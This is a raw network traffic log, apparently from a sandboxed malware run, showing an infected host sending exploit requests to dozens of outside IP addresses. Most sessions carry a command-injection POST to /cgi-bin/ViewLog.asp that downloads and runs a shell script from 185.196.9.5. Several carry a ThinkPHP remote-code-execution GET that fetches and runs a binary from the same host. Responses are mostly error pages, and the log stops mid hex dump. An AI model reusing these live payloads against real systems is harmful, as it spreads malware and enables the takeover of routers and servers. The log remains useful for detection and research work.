Feb 25, 2024 19:05:45.034672022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1303	192.168.2.15	50994	31.136.19.62	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.804488897 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.028445005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1304	192.168.2.15	60638	95.245.97.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.805039883 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:46.852526903 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:47.049437046 CET	134	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 42 Content-Type: application/json X-Content-Security-Policy: Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
1305	192.168.2.15	39902	94.121.58.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.830369949 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1306	192.168.2.15	44028	94.123.125.147	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.834825993 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1307	192.168.2.15	54390	85.194.179.184	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:46.275892019 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1308	192.168.2.15	38438	94.121.152.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:46.280854940 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1309	192.168.2.15	47982	95.125.130.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:46.284122944 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:46.508862019 CET	291	IN	HTTP/1.1 404 Not Found Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io; Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 25 Feb 2024 18:05:46 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
1310	192.168.2.15	56132	94.120.232.122	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:47.227648020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1311	192.168.2.15	44902	94.120.220.135	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:47.233488083 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1312	192.168.2.15	40002	95.86.127.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:47.237075090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1313	192.168.2.15	38294	94.121.222.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:47.238579988 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1314	192.168.2.15	43416	88.119.164.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:47.824251890 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:48.026366949 CET	932	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Sun, 25 Feb 2024 18:05:48 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1315	192.168.2.15	60698	88.82.218.193	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:47.840662956 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:48.095596075 CET	364	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1316	192.168.2.15	55558	88.99.14.205	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.008871078 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:48.195440054 CET	468	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:48 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1317	192.168.2.15	46388	88.221.224.239	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.016118050 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:48.209275961 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:05:48 GMT Date: Sun, 25 Feb 2024 18:05:48 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 33 30 63 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 34 38 26 23 34 36 3b 35 38 31 34 64 35 33 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c30c1502.1708884348.5814d531</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1318	192.168.2.15	36894	85.95.60.151	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.659878969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1319	192.168.2.15	57174	62.210.88.42	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.668117046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.850191116 CET	309	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 25 Feb 2024 18:05:48 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1320	192.168.2.15	36018	31.136.79.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.668277979 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.220402002 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1321	192.168.2.15	34156	95.164.169.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.758960009 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.931139946 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/4.10 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:05:48 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3543 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from localhost X-Cache-Lookup: NONE from localhost:8080 Via: 1.1 localhost (squid/4.10) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 